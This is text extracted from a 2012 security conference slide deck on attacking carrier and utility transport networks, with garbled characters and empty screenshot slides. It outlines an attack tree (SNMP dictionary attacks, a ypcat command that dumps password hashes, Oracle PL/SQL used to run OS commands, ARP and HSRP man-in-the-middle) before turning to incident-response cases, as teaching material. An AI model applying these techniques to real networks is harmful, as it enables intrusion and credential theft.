deepsec 2012 own the network – own the data · presentation session transport network data link...

www.dynetics.com

Information Engineering Solutions

DeepSec 2012

Own the Network – Own the Data Paul Coggin

Internetwork Consulting Solutions Architect [email protected]

UNCLASSIFIED

V100230_Faint

UNCLASSIFIED

2 UNCLASSIFIED 0000-00-yymm Information Engineering Solutions

Introduction

•  Network Security Architect – 18 Years experience •  BS Math, MS Computer Informa@on Systems, Graduate Studies in IA & Security •  Cer@fica@ons: Cisco, ISC^2, EC-‐Council •  Cisco and EC-‐Council Instructor •  U@li@es, Telecommunica@ons and Service Provider Experience -‐ Transport: Op@cal(DWDM, SONET), MPLS, 10G Ethernet -‐ Triple Play Services: Voice, IPTV -‐ OSS and Network Management -‐ Access Networks: HFC Cable, DSL, FTTX, Wireless, ATM, Frame Relay -‐ Security: Penetra@on Tes@ng, Network Security Architecture, Vulnerability Analysis -‐ Rou@ng and Switching

UNCLASSIFIED

V100230_Faint

UNCLASSIFIED


Hub & SpokeSONET/SDH Ring

Network Management

GE Ring

Application Services

Residential

Branch Office

L3VPN-PE

MPLS/IP P

Internet P

Video Headend IPTV/VOD

SIP Proxy

L3VPN-PE L3VPN-PE

Residential Telecommuter

SOHO Energy Distribution

DSL

or F

iber

E

dge

CE

M

etro

Acc

ess/

A

ggre

gatio

n E

dge

Cor

e

Provisioning Servers

Assurance Servers

Billing Servers

Next Generation Network Architecture

Water / Sewer Treatment Plant

U-PE/ PE-AGG

Web server

VoIP GW

Si Si

Si Si

Si Si Si Si

Si Si

Enterprise

Policy & Control PlaneBRAS/ISG

Con

trol

/App

licat

ions

/

N

MS

Policy Server

DHCP Server

AAA Server Lawful

Intercept

SCE

ICS / SCADA

Cell Tower

DWDM

Situational Awareness Servers

Data Service Voice Service Video Service

Insertion Point Smart Grid

Demand for Bandwidth driving Optical Network Growth; Telcos, …

Triple Play and Smart Grid Service

TCP\IP Wire Tap

Cellular Mobile IP Backhaul

Carrier Class Telco Networks 10 Gig, Highly Redundant

Thousands Of Devices

Internet to customer premise automation

UNCLASSIFIED

V100230_Faint

UNCLASSIFIED


Transport Networks

IP+Optical

•  IP MPLS based network services over DWDM •  IP Services over SONET •  Legacy TDM Services over SONET •  Cell Tower T1 Backhaul to Support 3G and 4G Router Router

Management Plane

The equipment in each layer of the transport network has it’s own network element management system with trust relationships and interdependencies. - Routing protocols - Inband\Out of band management - Provisioning - Control\Management\Data planes to secure

UNCLASSIFIED

V100230_Faint

UNCLASSIFIED


Cyber Attack Model

OSI Model

7

6

5

4

3

2

1

Application

Presentation

Session

Transport

Network

Data Link

Physical

TCP/IP Model

Network Interface

Application

Transport

Internet

MITM (Intercept, Modify),

DoS, RF (Jam, Replay)

Session Hijacking and Spoofing (Intercept, Modify, Bypass Network

Security), DoS

Malware, OS and Application level; Remote and Privilege Escalation

exploits, Bots, Phishing

RF, Fiber, Copper

UNCLASSIFIED

V100230_Faint

UNCLASSIFIED


IP Transport Cyber Attack Vectors

Network and System Architecture -‐  Centralized, Distributed, Redundant -‐  Physical and Logical

Transport Network -‐  RF, Fiber, Copper

Network Protocols -‐  Rou@ng, Switching, Redundancy -‐  Apps, Client/Server

Client\Server Architecture HW, SW, Apps, RDBMS -‐  Open Source -‐  Commercial

Trust RelaHonships -‐  Network Management and Network Devices -‐  Billing, Middleware, Provisioning

Common HW/SW configura@on se`ngs

Network InfrastructureAttack Vectors

SNMP Community String Dictionary Attack

with Spoofing to Download Router\

Switch Configuration

Build New Router Configuration File to

enable further privilege escation

Upload New Configuration File

Using Comprimised SNMP RW String

UNIX NetMgt Server Running NIS v1

Ypcat -d <domain> <server IP> passwd Grab shadow file hashes

Crack Passwords

Access Server Directly

Exploit ACL Trust

RelationshipAttack SNMP\Telnet\SSH

Find NetMgt

passwords and SNMP config files

Discover Backup HW Configs

Crack Passwords

HP OpenView ServerEnumerate Oracle

TNS Listener to Identify Default SID’s

Further Enumerate Oracle SID’s to Identify Default

DBA System Level Accts\Passwords

Login to Oracle DB with Discovered DBA

Privilege Account

Run Oracle SQL CMDs

Execute OS CMDs Add New

Privileged OS Account

Crack Passwords

Further Enumerate Oracle SID’s to

Identify User Accts.

Perform Dictionary Attack

Execute OS CMDs from Oracle PL/SQL

Attack Network from DB

Run Oracle SQL CMDs Execute OS CMDs

Find NetMgt Passwords, SNMP info, OS password

files

Network Mgt Application

Attempt to Login Using Default Login\Password

Reconfigure Router or Switch

MITM ARP Poisoning

Sniffing

Capture SNMP Community Strings and Unencrypted

Login\Passwords, Protocol Passwords

Configure Device for

Further Privilege

Escalation

Telnet\SSHDictionary Attack Router\Switches\NetMgt Server

Inject New RoutesOr Bogus Protocol

Packets

Use New Privileged OS account to

Escalate Privileged Access to Network

Own Network Infrastructure






Build New Router Configuration File to

enable further privilege escation

Transport Network Infrastructure Cyber Attack Tree

Attack Vectors - Deny, Disrupt, Delay, Intercept, Exploit Man in the Middle Attacks (MITM) Network Protocols IP Spoofing Apps / RDBMS / NetMgt Traffic Analysis

UNCLASSIFIED

V100230_Faint

UNCLASSIFIED


What Can You Do With a Router or Switch?

•  Inject route prefixes to hide source of aback or enable a more complex MITM aback by cracing rou@ng protocol packets

•  Configure Route Maps to forward traffic based on ACL criteria •  Lawful Intercept – Forward a copy of interes@ng traffic using

CISCO-‐TAP-‐MIB, CISCO-‐TAP2-‐MIB, CISCO-‐IP-‐TAP-‐MIB •  Span ports (port mirroring) to enhance packet capturing

capability •  Review rou@ng tables to iden@fy key targets •  DoS or MITM by cracing HSRP, rou@ng protocol, or spanning-‐

tree packets •  Configure a router to be a DHCP server to create a MITM aback

vector

UNCLASSIFIED

V100230_Faint

UNCLASSIFIED


Example Cyber Attack Exploiting Trust Relationship

Identified two target subnets and discovered product use with known

vulnerabilities *

Social networking & Career

sites

IP “whois” information

Search engines

Operating System Version

Detection

Port Scanning

Ping Sweeps

* Employee’s resume on the LinkedIn social networking site references training in specific product technologies

First Subnet – Directory Traversal

Exploit

•  Installed web-based shell prompt to execute commands without log trail

•  Enumerated internal network and services on 2000 hosts

Network Information

Services (NIS)

•  After discovering NIS, ypcat command executed

•  Dumped a list of all usernames and password hashes on the system

Second Subnet - Firewall

•  https management interface for firewalls was accessible from public Internet

•  Brute force password cracking could compromise system (did not perform)

Scans against common ports outside corporate networks were used to narrow down

targets of interest

UNCLASSIFIED

V100230_Faint

UNCLASSIFIED


Oracle

•  Oracle is commonly used with HP Openview for inventory management

•  Default user account\passwords enabled and\or weak passwords typically found

•  Un-‐secure RDMS -‐ Good as a un-‐patched MS NT 4.0 server •  Open TNS listener \ SQL*NET listener •  RDMS can be used for execu@ng OS shell commands •  How about using the database and PL/SQL to aback the network?

The network infrastructure ACL’s trust the network management server IP address.

UNCLASSIFIED

V100230_Faint

UNCLASSIFIED


Oracle Username Password Enumeration

UNCLASSIFIED

V100230_Faint

UNCLASSIFIED


Oracle Password Dictionary Attack

UNCLASSIFIED

V100230_Faint

UNCLASSIFIED


Run OS Commands From Oracle PL/SQL

UNCLASSIFIED

V100230_Faint

UNCLASSIFIED


http://phoenixlabs.org/pg2/faq/

Example of a Network Exploit Using Oracle PL/SQL

Run SNMPWALK utility against Cisco IOS device using SNMP read only community string Cisco routers and switches running IOS 12.0 thru 12.1 have a known vulnerability where if you know the

unprivileged read only SNMP community string you can obtain the privileged read\write string

TFTP upload SNMPWALK using Oracle PL/SQL

UNCLASSIFIED

V100230_Faint

UNCLASSIFIED


PL/SQL Query - SNMPWALK Results

http://phoenixlabs.org/pg2/faq/ SNMP Read\Write Community String

UNCLASSIFIED

V100230_Faint

UNCLASSIFIED


HSRP MITM – Packet Analysis

HSRP Password Clear Text

UNCLASSIFIED

V100230_Faint

UNCLASSIFIED


HSRP MITM – Packet Crafting

Routers

Rogue Insider Crafted HSRP coup packet with

higher priority

UNCLASSIFIED

V100230_Faint

UNCLASSIFIED


Instrumentation

Secure Visualization and Instrumentation Enables Network Forensics

Root Cause Troubleshooting and Analysis

UNCLASSIFIED

V100230_Faint

UNCLASSIFIED


Incident Response Network Forensics using SVI – Case #1

Multiple Routers / Service Gateways

On-‐Line Message Fail Network Power Ch Up

Ch Dn Select Guide Menu NLC 3 STB

PC

IPTV & Radio Services

Video On Demand Services

Voice Services

Private Virtual Circuits TV

IP Phone

Separation of Service/ VLANs

IP DSLAM

DSLCPEDSLCPE

Residential Customer

Internet Services

Example Carrier Class Network

Network Instrumentation Critical to Security

Deep Inspection and Monitoring of Network

Flows / Packets

• Foreign IP address attacked DSL Modem.

• Changed DNS address to Relay Box in US.

Bad Guy Relay Server • Hijacked web requests and

web traffic

UNCLASSIFIED

V100230_Faint

UNCLASSIFIED


Incident Response Network Management Using SVI – Case #2

Multiple Routers / Service Gateways

On-‐Line Message Fail Network Power Ch Up

Ch Dn Select Guide Menu NLC 3 STB

PC

IPTV & Radio Services

Video On Demand Services

Voice Services

Private Virtual Circuits TV

IP Phone

Separation of Service/ VLANs

IP DSLAM

DSLCPEDSLCPE

Residential Customer

Internet Services

Example Carrier Class Network

Protocol and Logical Architecture Knowledge is Key

SVI -‐ Deep Inspec@on and Monitoring of Network

Flows / Packets

Customer Employee – mistakenly bridges Data and Video Networks

•  Malware existed on Data (ISP) user computers – Malware sends ICMP packets to DOS target.

•  Video equipment encapsulated DOS packets in all multicast groups. – sent to all video devices / users

•  Customer with SVI was alerted to unusual traffic on multicast VLAN for video.

•  Called for remote Incident Analysis/ Forensics on Network Packets showed multicasting of “bad Info” and misconfiguration of network logical data flows

UNCLASSIFIED

V100230_Faint

UNCLASSIFIED


Ques@ons?

deepsec 2012 own the network – own the data · presentation session transport network data link...

Documents